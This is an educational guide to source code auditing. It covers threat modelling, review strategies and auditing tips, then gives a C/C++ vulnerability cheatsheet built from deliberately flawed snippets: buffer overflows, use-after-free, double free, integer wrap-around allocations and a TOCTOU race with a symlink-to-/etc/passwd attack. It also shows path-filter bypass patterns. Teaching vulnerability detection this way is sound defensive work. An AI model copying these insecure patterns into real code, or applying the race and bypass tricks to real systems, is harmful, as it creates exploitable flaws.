Comprehensive Guide to Source Code Auditing
Part I: Introduction to Software Security Assessment
Introduction & Core Concepts
Preface
Software, though often perceived as inscrutable, deeply impacts daily life, raising questions about the security of systems we rely on. Software vulnerabilities are essentially weaknesses or bugs that attackers can exploit. Understanding these vulnerabilities involves looking past the apparent complexity to see how they work. Every software system operates under a security policy, which might be formally documented or exist as informal user expectations about reasonable system behavior. Vulnerabilities represent deviations from this policy that can be leveraged for attacks.
Security Expectations
Software security is often discussed based on three core components:
- Confidentiality: Requires keeping information private and hidden from unauthorized access. This applies to various sensitive data, from national intelligence to personal information.
- Integrity: Refers to the trustworthiness and correctness of data, ensuring it hasn't been altered improperly. It also relates to the authenticity of the data's source. Software maintains integrity by preventing unauthorized changes or detecting alterations.
- Availability: Ensures that information and resources are accessible and usable when needed. This involves resilience against denial-of-service (DoS) attacks.
Classifying Vulnerabilities
Vulnerabilities can be grouped into classes based on common patterns or concepts. This classification helps in understanding and communication, though a single flaw might fit into multiple classes.
- Design Vulnerabilities: Problems stemming from fundamental mistakes in the software's design or architecture. The software works as designed, but the design itself is insecure, often due to flawed assumptions about the environment or risks. Also known as high-level or architectural flaws.
- Implementation Vulnerabilities: Issues arising from how the design is coded. These occur during development, often due to deviations from the design or specific nuances of the platform or language used. Also called low-level or technical flaws.
- Operational Vulnerabilities: Security problems related to the software's configuration, deployment environment, or operational procedures, rather than the source code itself. Includes issues with configuration, supporting systems, and surrounding processes.
Common Threads
Recurring themes often underlie software vulnerabilities:
- Input and Data Flow: The majority of flaws arise from how a program responds to unexpected or malicious data inputs.
- Trust Relationships: Different software components trust each other to varying degrees, affecting the level of validation applied to exchanged data. Understanding these is key.
- Assumptions and Misplaced Trust: Developers might make incorrect assumptions about input data validity, environmental security, user capabilities, or API behavior, leading to vulnerabilities.
- Attack Vectors: Common entry points for attacks include user input, interfaces (APIs, network sockets), environmental factors (configuration files, system settings), and how exceptional conditions are handled.
Software Design Fundamentals
Algorithms and Problem Domain Logic
Software engineering involves developing and implementing algorithms. The design must specify key algorithms, data structures, and the rules (problem domain logic or business logic) the program follows. Security expectations for users and resources are a crucial part of this logic. Algorithm choices driven by performance needs should also be assessed for security implications.
Abstraction and Decomposition
Essential concepts for managing complexity:
- Abstraction: Reducing complexity by isolating important elements and hiding unnecessary details. Used to model processes and create hierarchies.
- Decomposition: Defining the generalizations and classifications within an abstraction. Can be top-down (specialization) or bottom-up (generalization).
Principles of Software Design
- Coupling: The level of communication and interdependence between modules. Loosely coupled modules interact via well-defined interfaces, which is generally better for security and maintainability, especially across trust boundaries. Strongly coupled modules have complex dependencies, expose internal details, often trust each other highly, and perform less data validation, making them prone to flaws if one component is compromised. Look for strong coupling across trust boundaries.
- Cohesion: A module's internal consistency and focus on related activities. Strong cohesion is desirable. Security issues can arise if a module handles multiple trust domains without proper decomposition, similar to coupling issues but occurring within a single module.
Fundamental Design Flaws & Policy Enforcement
Fundamental Design Flaws Examples
- Exploiting Strong Coupling: Communication channels designed for one context might insecurely couple different trust domains in another (e.g., Windows message queue allowing messages between processes of different privilege levels on the same desktop). Security needs to be considered when designs evolve or environments change.
- Exploiting Transitive Trusts: Attackers can manipulate trust between components. Accessing a public interface of one component might grant trusted access to another, more sensitive component if they share an implicit trust (e.g., running under the same user account). Lenient input validation based on assumed trust can exacerbate this (e.g., Solaris automountd vulnerability).
- Failure Handling: Balancing usability and security during error handling is crucial. Usability might favor detailed error messages and recovery attempts, but security often dictates terminating sessions and providing minimal feedback to avoid aiding attackers who intentionally trigger errors. Security requirements may need to supersede usability in these cases.
Enforcing Security Policy
Key mechanisms for enforcing security:
- Authentication: Verifying the identity of a user or system.
- Authorization: Determining permissions for an authenticated entity.
- Accountability: Logging actions to trace activity and ensure nonrepudiation. Crucial for post-incident analysis but often overlooked.
- Confidentiality: Ensuring data is viewed only by authorized parties, using access control and encryption.
- Availability: Ensuring resources are accessible when needed, protecting against DoS.
Threat Modeling & Operational Review
Threat Modeling
A structured process to identify potential threats:
- Information Collection: Gather all available information.
- Identify Assets, Entry Points, External Entities, Trust Levels, Major Components, Use Scenarios.
- Sources: Standard documentation (RFCs), Source Profiling (reviewing code structure, entry points), System Profiling (file layout, dependencies, imports/exports, sandboxing, network sniffing, scanning).
- Application Architecture Modeling: Understand the application structure and component interactions using models like DFDs. Review existing documentation or create new models.
- Threat Identification: Use techniques like Attack Trees to map potential attack paths. The tree root is the goal, branches are steps. Document potential mitigations for identified threats.
- Documentation of Findings: Summarize identified threats and provide remediation recommendations.
Operational Review
Analyzing security aspects of deployment and configuration:
- Exposure: Consider the deployment environment's impact (OS, network profile).
- Insecure Defaults: Preconfigured settings that pose risks (e.g., no wireless encryption, default passwords) often chosen for ease of use. Review application defaults and installation options (passwords, secure communication modes, access control).
- Access Control: How the application utilizes host OS or internal access control features.
- Unnecessary Services: Enabled functionality not required for operation increases the attack surface. Often results from insecure defaults or including unneeded features.
- Secure Channels: Ensuring communication confidentiality (e.g., encryption over networks, proper access control on local channels like named pipes).
- Spoofing and Identification: Weaknesses allowing impersonation; deployment might introduce risks not addressed by the application design alone.
- Network Profiles: Different protocols have different risk levels depending on network location (e.g., NFS/SMB inside vs. outside a firewall). Developers need to choose sensible defaults and document security concerns for various deployment scenarios.
Protective Measures
Defense-in-depth mechanisms applied during or after development:
- Development Time: Secure coding practices, safer languages/libraries.
- Host-Based: OS hardening, security software (AV, HIDS), memory protections (ASLR, Stack/Heap Protection, Non-executable Memory), sanitizers.
- Network-Based: Firewalls, IDS/IPS.
- Note: These measures exist outside the core application code but affect overall security; they can also introduce their own vulnerabilities.
The Application Review Process
Rationale & Process Outline
Rationale
Effective code review requires a pragmatic, flexible, results-driven approach. It's a creative process requiring understanding developer intent and hypothesizing unexpected behaviors, making it a skill developed over time. A rigid, step-by-step methodology is unrealistic, but a structured process enhances effectiveness, consistency, and manageability.
Process Outline
A flexible four-phase process:
- Preassessment: Planning, scoping the review, collecting initial information.
- Application Review: The core assessment phase, iteratively applying various strategies to cover design, logic, implementation, and operational aspects simultaneously.
- Documentation and Analysis: Collecting, documenting findings, conducting risk analysis, suggesting remediation.
- Remediation Support: Assisting developers with fixes and verification.
Preassessment & Review Strategy
Preassessment Details
- Scoping: Define the goal clearly (e.g., find biggest flaws fast vs. comprehensive coverage within budget/time).
- Application Access: The type of access dictates methodology:
- Source only: Static analysis focus.
- Binary only: Reverse engineering, dynamic analysis focus.
- Source and binary: Most efficient, combines static and dynamic.
- Checked build: Binary with debug info, aids analysis.
- Strict black box: Only external testing (fuzzing).
- Information Collection: Gather details via developer interviews, documentation, standards, source profiling, system profiling.
Application Review Strategy
An iterative approach is often best, as understanding deepens over time. Avoid rigid waterfall-style reviews where design review happens only at the start when knowledge is lowest.
- Avoid Drowning: Switch between different techniques periodically to maintain focus and motivation, and cover different vulnerability types. Recognize that intense concentration is limited.
- Iterative Process: Repeat a cycle of Plan -> Work -> Reflect.
- Plan: Decide the next target/goal or auditing strategy for a manageable work block (2-8 hours). Examples: Identify entry points, list uses of unsafe functions, trace a complex path.
- Work: Execute the strategy, taking extensive notes. Maintain a master list of ideas/potential issues.
- Reflect: Check progress, focus, time management. Ask: What learned? Focusing correctly? Sidetracked? Notes adequate? Models accurate? Re-evaluate the plan if needed, but don't mistake lack of findings for a flawed plan immediately. Take breaks as needed, either by switching tasks or stepping away completely. Don't fall down rabbit holes; balance depth with coverage and deadlines.
- Initial Preparation: Decide on review structure:
- Top-Down: Start from design/threat model, refine by assessing implementation along key paths. Good if docs are accurate, risky otherwise.
- Bottom-Up: Start from implementation details, build understanding upwards. Thorough but potentially slow. Maintain a design model as you go.
- Hybrid: Combine approaches, often best when design docs are lacking. Start by identifying high-level characteristics (purpose, assets, entry points, components, trust boundaries) and refine iteratively.
Code-Auditing Tactics
Code-Auditing Tactics
Techniques to apply during the review:
- Code Navigation: Understand how code flows.
- External Flow Sensitivity: Analyze how execution proceeds between functions, considering control flow (following calls) and data flow (tracking variable use). Often, reviewing functions in isolation (insensitive) is more efficient initially.
- Tracing Direction: Forward tracing (from entry point) evaluates functionality; backward tracing (from candidate point) evaluates reachability. Back-tracing is often faster but relies on good candidate point identification and can miss logic flaws.
- Internal Flow Analysis: Analyze control and data flow within a function. Carefully examine all relevant code paths, including error-checking branches and complex (pathological) paths, as these are often less tested.
- Subsystem and Dependency Analysis: Familiarize yourself with shared components (custom allocators, string handlers, parsers) and standard library functions used, including their potential quirks and side effects.
- Re-Reading Code: Multiple passes over the same code are often necessary to consider different vulnerability classes or fully understand complex logic. Ask detailed questions even about simple-looking code (global variable changes, initialization, return value handling).
- Desk-Checking: Manually trace variables through code with specific input values to understand complex logic or side effects.
- Test Cases: Use specific inputs (manually, via debugger, or with small test programs) to verify behavior, especially at boundaries or with unexpected values.
Code-Auditing Strategies
Code-Auditing Strategies
Methods for approaching the code:
- Code Comprehension (CC): Focus on understanding the code directly.
- CC1: Trace Malicious Input: Follow potentially tainted data from entry points, looking for unsafe operations. Requires experience; can be difficult in complex/OO code.
- CC2: Analyze a Module/File: Read code line-by-line within a file/module, taking notes on potential issues without necessarily tracing every call. Builds deep understanding but is taxing and risks reviewing non-relevant code.
- CC3: Analyze an Algorithm: Focus line-by-line analysis on a specific, security-relevant algorithm (e.g., crypto, security model enforcement, input processing).
- CC4: Analyze a Class/Object: Similar to CC2/CC3 but focused on a class; effective for OO code.
- CC5: Trace Black Box Hits: Investigate crashes or anomalies found via fuzzing/manual testing by tracing the problematic input/scenario in the source code. Requires a working application version.
- Candidate Point (CP): Identify potential issues (candidate points) first, then verify. Faster for common bugs but less comprehensive.
- CP1: General Candidate Point Approach: Identify potentially unsafe constructs (e.g., `sprintf` use, dynamic SQL) via tools or knowledge, then back-trace to see if they are reachable with untrusted input. Verification is required for each candidate. Relies on assumptions about what constitutes a vulnerability.
- CP2: Automated Source Analysis Tools (SAST): Use tools to find candidate points based on known patterns. Can cover large codebases but suffer from false positives, high cost/effort, and an inability to find novel or complex logic/design flaws. The technology is improving but is best used to augment manual review.
- CP3: Simple Lexical Candidate Points: Use text search (`grep`, `findstr`) for specific vulnerable patterns (e.g., `printf` with a non-static format string, `strcpy`, `../`). Filter the list based on context (e.g., does it handle user input?), then verify using CP1.
- CP4: Simple Binary Candidate Points: Search compiled binaries for patterns when source is unavailable (e.g., specific instructions like `movsx` for sign-extension issues, or string literals corresponding to vulnerable functions). Verify as with CP3.
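As a minimal illustration of the lexical candidate-point search, the following shell snippet creates a throwaway C file and greps it for classic candidate points. The file path and pattern list are arbitrary examples, not a complete audit ruleset.

```shell
# Create a small throwaway C file to search (illustrative path and contents).
cat > /tmp/audit_demo.c <<'EOF'
#include <string.h>
void f(char *in) { char buf[16]; strcpy(buf, in); }
EOF

# Flag classic unsafe calls; -n records line numbers for the audit log.
grep -nE 'strcpy|sprintf|gets\(' /tmp/audit_demo.c
```

Each hit is only a candidate: the context filter (does it handle user input?) and back-trace verification still have to follow.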
- Design Generalization (DG): Infer high-level design/logic from implementation to find flaws. Requires good code understanding.
- Model the System: Build/refine design models based on code analysis.
- Hypothesis Testing: Formulate and test hypotheses about design assumptions or expected behavior based on code.
- Deriving Purpose and Function: Understand what components actually do based on implementation, compare with intended function.
- Design Conformity Check: Compare implementation against documented or inferred design to find discrepancies.
Auditing Tips & Considerations
Auditing Tips & Considerations
- Variable Relationships: Identify variables whose values depend on each other or represent a combined state. Check if code paths exist where these related variables can become desynchronized or inconsistent.
- Structure/Object Mismanagement: In OO code or code using complex structs, understand the purpose of members and interfaces. Look for ways to desynchronize related members or leave objects in unexpected states.
- Initialization: Check if code paths exist where variables might be read before being initialized. Pay attention to cleanup code (epilogues) jumped to from multiple locations and functions assuming variables are initialized elsewhere.
- Arithmetic Boundaries: Follow a structured process:
- Find operations where boundary conditions (overflow/underflow) have security impact (e.g., length calculations, comparisons).
- Determine input values triggering the boundary condition.
- Check if the vulnerable code path is reachable with those values, considering type constraints and validation checks.
- Type Confusion: Be wary of `union` types where the code might misinterpret which member is active, especially confusing pointers and integers or different struct types. Check the logic controlling union interpretation.
- Looping Constructs: Focus on data-processing loops. Check for common errors:
- Incorrect terminating conditions (failing to account for buffer sizes, off-by-one errors). Audit Tip: When loops copy data without size validation, check whether the source can be larger than the destination. Audit Tip: Mark exit conditions and manipulated variables; check for inconsistent states, especially on error exits.
- Using post-test (`do...while`) when pre-test (`while`, `for`) is needed, potentially executing the loop body once incorrectly.
- Missing/misplaced `break` or `continue` statements.
- Punctuation errors changing loop behavior.
- Flow Transfer Statements: Misuse of `break` (e.g., breaking from the wrong nested structure, like an `if` inside a `switch`), `continue`, or `goto` can lead to unexpected control flow. Check `switch` statements for missing `break`s (fallthrough) and missing `default` cases.
- Function Calls: Analyze calls for:
- Misinterpreted/ignored return values (status/error codes, resulting values).
- Incorrectly formatted arguments (type mismatches, wrong intended meaning). Audit Tip: List argument types/meanings; check callers for type conversions (especially sign changes and sign extensions) or incorrect arguments.
- Unexpected updates to arguments passed by reference (side effects). Audit Tip: Note functions altering pass-by-reference arguments or global state; check whether callers account for this (e.g., pointers updated after `realloc`).
- Unexpected global state changes.
- Function Audit Logs: Maintain notes on function purpose, arguments, return values, side effects, potential issues to aid analysis.
- Memory Management Auditing:
- ACC Logs: Use Allocation-Check-Copy logs to track buffer allocation size formulas, size checks applied to data, and copy operations performed on the buffer to spot discrepancies.
- Data Assumptions: Be skeptical of assumptions about the format/content of binary data, especially proprietary formats; they can be reverse-engineered and manipulated.
- Allocation Functions: Understand custom allocator behavior; don't assume they are robust. Check handling of edge cases (e.g., zero-size allocation).
- String Handling:
- Character Expansion: Check code encoding special characters; ensure destination buffers are large enough for the expanded string.
- Metacharacters: Understand how metadata is embedded (in-band) vs. stored separately (out-of-band). In-band metacharacters (like NUL terminators, path separators `/`, hostname separators `.`, SQL quotes `'`) create implicit trust boundaries that parsing routines must handle correctly. Scrutinize code constructing strings from user input (filenames, SQL queries, email addresses, registry paths) for improper sanitization leading to injection attacks.
- Auditing Tip: Code using `snprintf` often combines user data with static data; check for potential embedded delimiters or truncation of static parts if the user data is too long.
- Auditing Tip: For format strings, search the `printf`/`syslog`/`err` families for non-static format string arguments; trace back to user control. Check wrappers passing varargs too.
- Auditing Tip: When auditing multicharacter filters (e.g., for `../`), check for bypasses using embedded patterns (e.g., `....//`) or incomplete substitution (e.g., `s/\.\.\///g` in Perl/PHP).
- File System Issues (UNIX focus):
- Auditing Tip: Use of `access()` usually indicates a TOCTOU race condition; `stat()` has similar issues when used on filenames.
- Auditing Tip: If you find a file descriptor duplication vulnerability, use tools like `lsof` in a similar environment to see what sensitive FDs might be accessible.
- stat() Family: Understand `stat` (follows links), `lstat` (doesn't follow links), and `fstat` (operates on an FD, safest with respect to races). Know the macros for checking file types (S_ISREG, S_ISDIR, S_ISLNK, etc.).
- Evading Access Checks: Look for the pattern of a check function on a filename (`stat`, `access`) followed by an action function on the filename (`open`, `chmod`, `unlink`). The safe pattern uses checks and actions on file descriptors (`fstat`, `fchmod` after `open`).
Documenting Findings & Auditor Toolbox
Documenting Findings
Provide clear and actionable information for each finding:
- Location: File, function, line number(s).
- Vulnerability Class: Type (e.g., buffer overflow, integer overflow).
- Description: Explanation of the issue.
- Prerequisites: Conditions required to trigger.
- Business Impact: How it affects the organization/users.
- Remediation: Suggestions for fixing the flaw.
- Risk Rating: Overall risk (e.g., using DREAD: Damage, Reproducibility, Exploitability, Affected Users, Discoverability) incorporating severity and probability.
- Severity: Potential damage if exploited.
- Probability: Likelihood of successful exploitation.
- Overall Summary: Conclude with a general assessment of the application's security posture and observed trends.
Code-Auditor Toolbox
Essential tools for auditors:
- Source Code Navigators: Features: Cross-referencing (definitions/uses), text searching, multi-language support, syntax highlighting, graphing (call trees), scripting. Examples: ctags, cscope, IDEs, Source Insight.
- Debuggers: Features: Kernel debugging, memory searching, scripting, debug symbol support, conditional breakpoints, thread support, on-the-fly assembling, remote debugging. Examples: gdb, WinDbg, OllyDbg, IDA Pro debugger.
- Disassemblers/Decompilers: IDA Pro, Ghidra, Binary Ninja.
- Fuzz-Testing Tools: SPIKE framework, AFL, libFuzzer, Peach Fuzzer.
- Automated Code Auditing (SAST): Tools vary widely in capability and cost. Examples: SonarQube, Checkmarx, Fortify SCA.
- Text Search Utilities: `grep`, `findstr`.
Part II: Software Vulnerabilities
C/C++ Vulnerabilities Cheatsheet & Details
C/C++ Vulnerabilities Cheatsheet & Details
1. Memory Corruption Vulnerabilities
- 1.1 Stack Buffer Overflow
- Description: Writing past the allocated boundary of a fixed-size buffer on the stack. Can overwrite return addresses, saved frame pointers, or local variables. Often caused by unsafe functions like `strcpy`, `sprintf`, `gets`, or `scanf` without bounds checking.
- Example:

```c
void vulnerable_function(char *input) {
    char buffer[10];
    // scanf("%s", buffer);   // Original cheatsheet example uses scanf
    strcpy(buffer, input);    // Stack_BoF.md example uses strcpy; no bounds check
    printf("Buffer contents: %s\n", buffer);
}
```

- Algorithm:

```
type VARIABLE[SIZE]
VARIABLE = (VALUE > SIZE)
```

- SEH Overwrite (Windows Specific): Stack overflows can overwrite Structured Exception Handling (SEH) records, allowing a control-flow hijack when an exception occurs.
- 1.2 Heap Buffer Overflow
- Description: Writing past the allocated boundary of a buffer dynamically allocated on the heap (via `malloc`, `calloc`, `new`). Can overwrite heap metadata (chunk headers) or adjacent allocated objects. Caused by unsafe copy functions without bounds checks on heap buffers.
- Example:

```c
void vulnerable_function(char *input) {
    char *buffer = (char *)malloc(10);  // Allocate 10 bytes on the heap
    // scanf("%s", buffer);   // Original cheatsheet example uses scanf
    strcpy(buffer, input);    // Heap_BoF.md example uses strcpy; no bounds check
    printf("Buffer contents: %s\n", buffer);
    free(buffer);
}
```

- Algorithm:

```
type *VARIABLE = malloc(SIZE)
*VARIABLE = (VALUE > SIZE)
```
- 1.3 Off-by-one errors
- Description: A specific type of bounds error where exactly one byte or element is written past the end of a buffer. Often caused by using `<=` instead of `<` in loop conditions comparing against the buffer size, or forgetting space for a null terminator.
- Example:

```c
void process_string(char *src) {
    char dest[32];
    int i;
    // Off-by-one: "i <= sizeof(dest)" permits a write to dest[32],
    // one element past the end; the condition should be "i < sizeof(dest)".
    for (i = 0; src[i] && (i <= sizeof(dest)); i++) {
        dest[i] = src[i];
    }
    // Potential fix: ensure null termination if the loop completes
    // if (i < sizeof(dest)) dest[i] = '\0';
}
```

- Algorithm:

```
type VARIABLE[SIZE]
condition: if counter <= sizeof(VARIABLE) then write   // Should be <
```
- 1.4 Memory Leaks
- Description: Allocating memory (e.g., `malloc`, `new`) but failing to release it (`free`, `delete`) when it is no longer needed. Consumes available memory, potentially slowing or crashing the system. Primarily an availability issue.
- Example:

```c
int main(int argc, char **argv) {
    int count = 0;
    int LOOPS = 10;
    int MAXSIZE = 256;
    char *pointer = NULL;
    for (count = 0; count < LOOPS; count++) {
        pointer = (char *)malloc(MAXSIZE);  // Each iteration discards the previous block
    }
    free(pointer);  // Frees only the final allocation; the other nine are leaked
    return 0;
}
```

- Algorithm:

```
loop {
    type VARIABLE = malloc(sizeof(type))
}
// VARIABLE only points to the last allocation; the previous ones are lost
free VARIABLE   // Only frees the last
```
- 1.5 Use-After-Free
- Description: Accessing a memory location after it has been freed. Can lead to crashes, data corruption, or code execution if the memory is reused by the allocator for different data/objects. Common causes: error conditions freeing memory early, confusion over ownership/freeing responsibility.
- Example:

```c
// Cheatsheet example variation
char *ptr = (char *)malloc(SIZE);
int abrt = 0;            // Added for example clarity
if (err) {               // Assume 'err' is some error condition
    abrt = 1;
    free(ptr);
}
// ... later ...
if (abrt) {
    // UAF: ptr used after the free above
    logError("operation aborted before commit", ptr);
}

// README.md example (conceptual, focuses on heap layout interaction)
// buf1R1 = malloc(512);
// buf2R1 = malloc(512);
// free(buf2R1);
// buf2R2 = malloc(248);            // Might reuse part of freed buf2R1
// buf3R2 = malloc(248);            // Might reuse the other part
// strncpy(buf2R1, argv[1], 511);   // UAF: write to freed buf2R1, potentially
//                                  // corrupting buf2R2/buf3R2 metadata or content
```

- Algorithm:

```
type VARIABLE = malloc(sizeof(TYPE))
free VARIABLE
// ... later usage ...
use VARIABLE
```
- 1.6 Double-Free
- Description: Calling `free` (or `delete`) more than once on the same pointer. Can corrupt heap metadata, potentially allowing write-what-where primitives. Modern allocators often detect simple double frees, but complex scenarios or custom allocators might still be vulnerable. Also possible via `realloc(ptr, 0)` on some systems. Be mindful in C++ destructors and complex error-handling paths.
- Example:

```c
char *ptr = (char *)malloc(SIZE);
int abrt = 0;    // Added for clarity
// ... some operations ...
if (abrt) {
    free(ptr);
}
// ... more operations ...
free(ptr);       // Double free if abrt was true
```

- Algorithm:

```
type VARIABLE = malloc(sizeof(TYPE))
free VARIABLE
...
free VARIABLE
```
- 1.7 Out-Of-Bounds Write
- Description: Writing data past the end or before the beginning of the intended buffer. This is a general case including stack/heap overflows and incorrect array indexing.
- Example:

```c
// OOBW.md example
int buffer[5];
int index;
printf("Enter an index (0-4): ");
scanf("%d", &index);
buffer[index] = 42;   // OOB write if index < 0 or index >= 5 (no bounds check)

// Cheatsheet example
// int id_sequence[3];    // Valid indices: 0, 1, 2
// id_sequence[3] = 456;  // OOB write one element past the end
```

- Algorithm:

```
type VARIABLE[SIZE]
VARIABLE[INDEX] = VALUE   // Where INDEX >= SIZE or INDEX < 0
```
- 1.8 Uninitialized Data Access
- Description: Reading data from a variable or memory location that has not been explicitly initialized. The variable holds residual data from previous memory use, leading to unpredictable behavior or information leakage. Check all code paths, especially error paths, to ensure variables are initialized before use.
- Example:

```c
int main(void) {
    char buffer[10];
    int condition = 0;
    if (condition) {
        strcpy(buffer, "init");   // Only initialized on this path
    }
    printf("%s", buffer);  // Reads uninitialized stack data when condition is false
    return 0;
}
```

- Algorithm:

```
type VARIABLE
...                  // No assignment to VARIABLE on some path
func_read(VARIABLE)  // Use of uninitialized VARIABLE
```
2. Pointer Manipulation
- 2.1 Null-Pointer Dereference
- Description: Attempting to read from or write to address 0 (NULL). Typically causes a crash (DoS).
- Example:

```c
char *ptr = NULL;
// The dereference may happen inside a function call that uses the pointer:
// function_call(ptr);
// Or directly:
*ptr = 'a';      // Write through NULL: crash
char c = *ptr;   // Read through NULL: crash
```

- Algorithm:

```
type *VARIABLE = NULL
*VARIABLE = ...   // or ... = *VARIABLE
```
- 2.2 Dangling Pointers
- Description: A pointer that references memory that has been freed or is no longer valid (e.g., points to a local variable whose scope has ended). Using it leads to behavior similar to Use-After-Free.
- Example:

```c
char *dp = NULL;
{
    char c = 'x';
    dp = &c;
}   // c goes out of scope; its stack memory can be reused
// dp now points to invalid stack memory
// *dp = 'y';   // Undefined behavior, potential corruption
```
- 2.3 Uninitialized Pointers
- Description: Using a pointer variable before it has been assigned a valid memory address. It points to an arbitrary location; dereferencing leads to crashes or unpredictable behavior.
- Example:

```c
int *ptr;     // Uninitialized pointer: holds an indeterminate address
*ptr = 5;     // Dereferencing it -> crash or memory corruption
```

- Algorithm:

```
type *DATA
*DATA = ...   // Dereference of DATA before any assignment, or ... = *DATA
```
- 2.4 Pointer Arithmetic Issues
- Description: Errors arising from misunderstanding how pointer arithmetic works in C/C++. Operations (+, -) scale by the size of the pointed-to type. Comparing pointers compares addresses. Adding two pointers is invalid; subtracting pointers (of the same type) yields the element difference (`ptrdiff_t`). Common bugs involve using byte offsets where element offsets are needed, or `sizeof(pointer)` instead of `sizeof(buffer)`.
- Example (Scaling):
```c
short *j = (short *)0x1000;   // Example address
j = j + 1;                    // j now points to 0x1002 (assuming short is 2 bytes)
```
- Example (Sizeof misuse):
```c
int buf[1024];
int *b = buf;

// Incorrect: sizeof(buf) is in bytes, but the addition is scaled by
// sizeof(int), so 'buf + sizeof(buf)' points far past the end of the array.
// while (havedata() && b < buf + sizeof(buf)) { *b++ = val; }

// Correct (usually): compare against the one-past-the-end pointer...
while (havedata() && b < &buf[1024])
    *b++ = val;

// ...or use an index:
// for (i = 0; i < 1024; i++) buf[i] = val;
```
- Auditing Tip: Check arithmetic involving pointers; verify the operation aligns with the implicit scaling based on the pointer type. Look for incorrect `sizeof` usage (pointer vs. buffer).
3. Concurrency and Synchronization
- 3.1 Race Conditions
- Description: Outcome depends on the unpredictable sequence or timing of concurrent operations, often involving shared resources accessed without proper locking. Can lead to corrupted data, crashes, or security bypasses.
- Example (Shared Queue without Locks):
```c
// Conceptual - from cheatsheet, simplified
struct element *queue = NULL;            // Shared resource

void enqueue(struct element *new_obj) {
    // ... find end of queue ...         (needs locking)
    // tmp->next = new_obj;              (needs locking)
}

struct element *dequeue(void) {
    // if (queue == NULL) ...            (needs locking)
    // elem = queue;                     (needs locking)
    // queue = queue->next;              (needs locking)
    // return elem;
}

// Problem: if dequeue reads 'queue' just before another thread sets it to
// NULL, or if two threads dequeue simultaneously, errors occur.
```
- TOCTOU (Time-of-Check to Time-of-Use): A specific race where a check is performed on a resource, but the resource changes state before it's used. Common with filesystem operations.
- Example:
```c
if (access("file", W_OK) == 0) {
    fd = open("file", O_WRONLY);
}
```
- Attacker could change "file" (e.g., make it a symlink to /etc/passwd) between `access` and `open`.
- Auditing Tip: `access()`/`stat()` on filenames are suspect; prefer checks on file descriptors (`fstat`) after opening.
- Filesystem Races (UNIX):
- Permission Races: File created with weak permissions, then fixed; attacker opens during the window.
- Ownership Races: File created by a non-privileged user, then `chown`ed to a privileged user; attacker acts during the window.
- Directory Races: Attacker manipulates the directory structure (e.g., replaces a directory with a symlink) while a privileged process traverses it.
- 3.2 Starvation and Deadlocks
- Description:
- Starvation: A thread is perpetually denied access to necessary resources.
- Deadlock: Two or more threads block each other indefinitely, each waiting for a resource held by another. Requires: Mutual Exclusion, Hold and Wait, No Preemption, Circular Wait. Can also occur if locks aren't released due to errors.
- Example (Deadlock - Incorrect Lock Ordering):
```c
// mutex1, mutex2 are shared locks
void thread1(void) {
    lock(mutex1);
    // ...
    lock(mutex2);      // Might block if thread2 holds mutex2
    // ...
    unlock(mutex2);
    unlock(mutex1);
}

void thread2(void) {
    lock(mutex2);
    // ...
    lock(mutex1);      // Might block if thread1 holds mutex1
    // ...
    unlock(mutex1);
    unlock(mutex2);
}

// Deadlock if thread1 locks mutex1, thread2 locks mutex2, and then each
// tries to take the lock the other holds.
```
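The standard fix is to impose a single global lock order that every thread follows; circular wait then becomes impossible. A runnable sketch with POSIX threads (the `worker` function and counter are illustrative):

```c
#include <pthread.h>

pthread_mutex_t mutex1 = PTHREAD_MUTEX_INITIALIZER;
pthread_mutex_t mutex2 = PTHREAD_MUTEX_INITIALIZER;
int shared_counter = 0;

/* Every thread acquires mutex1 before mutex2, so no thread can ever hold
   mutex2 while waiting for mutex1: the circular-wait condition required
   for deadlock can never form. */
void *worker(void *arg) {
    (void)arg;
    for (int i = 0; i < 1000; i++) {
        pthread_mutex_lock(&mutex1);
        pthread_mutex_lock(&mutex2);
        shared_counter++;                /* protected by both locks */
        pthread_mutex_unlock(&mutex2);   /* release in reverse order */
        pthread_mutex_unlock(&mutex1);
    }
    return NULL;
}
```

When a fixed order is impractical, `pthread_mutex_trylock` with back-off on failure is a common fallback.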
- 3.3 Inadequate Locking
- Description: Failing to acquire necessary locks, holding locks for too short a duration, or using the wrong type of lock when accessing shared resources, allowing race conditions.
- Example:
```c
// Conceptual - based on cheatsheet example description
pthread_mutex_t mutex;

void *thread_func(void *arg) {
    // The lock must cover ALL accesses to the shared data, not just part.
    pthread_mutex_lock(&mutex);
    // access_shared_data_part1();
    pthread_mutex_unlock(&mutex);   // Released too early?

    // access_shared_data_part2();  // Unprotected access
    return NULL;
}
```
- 3.4 Re-entrancy
- Description: A function is non-reentrant if it cannot be safely interrupted and called again (by another thread or signal handler) before the first call completes. Often due to reliance on shared state (global/static variables) without proper locking or use of non-reentrant library functions.
- Example:
```c
// Cheatsheet example, conceptual
double account_balance = 1000.0;     // Shared state

void process_transaction(double amount) {
    // Non-reentrant if called concurrently without locks:
    double current_balance = account_balance;
    // An interruption here by another thread calling process_transaction
    // can lose one of the two updates.
    current_balance += amount;       // Simulate work
    account_balance = current_balance;
}
```
4. Arithmetic Boundary Vulnerabilities
- 4.1 Unsigned Integer Boundaries (Wrap Around)
- Description: Unsigned integers wrap around on overflow (large value becomes small) or underflow (small value becomes large). Exploitable if used in size calculations where overflow leads to small allocation followed by large copy, or in security checks.
- Example (Allocation Size Overflow):
```c
// From Art of VR description
unsigned int width = 0x400, height = 0x1000001;
unsigned int n = width * height;            // n wraps around to 0x400 (1024)
char *buf = (char *)malloc(n);              // Allocates only 1024 bytes
for (int i = 0; i < height; i++)            // Loop runs 'height' times (>> 1024)
    memcpy(&buf[i * width], init_row, width);  // Massive heap overflow
```
- Example (Multiplication Overflow before Allocation):
```c
// From Art of VR description (SSH exploit)
u_int nresp = 0x40000020;                   // Large count from packet
// nresp * sizeof(char *) = 0x40000020 * 4 = 0x100000080,
// which wraps to 0x80 (128) on a 32-bit system.
response = xmalloc(nresp * sizeof(char *)); // Allocates only 128 bytes
for (i = 0; i < nresp; i++)                 // Loop runs 0x40000020 times
    response[i] = packet_get_string(NULL);  // Massive heap overflow
```
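Both overflows above could have been caught by guarding the multiplication before allocating. A minimal sketch of such a guard (the helper name `checked_mul` is illustrative; the division test is a portable way to detect wrap-around):

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 and stores a*b in *out if the product fits in size_t;
   returns 0 if the multiplication would wrap around. */
int checked_mul(size_t a, size_t b, size_t *out) {
    if (a != 0 && b > SIZE_MAX / a)
        return 0;          /* a*b would exceed SIZE_MAX: refuse */
    *out = a * b;
    return 1;
}
```

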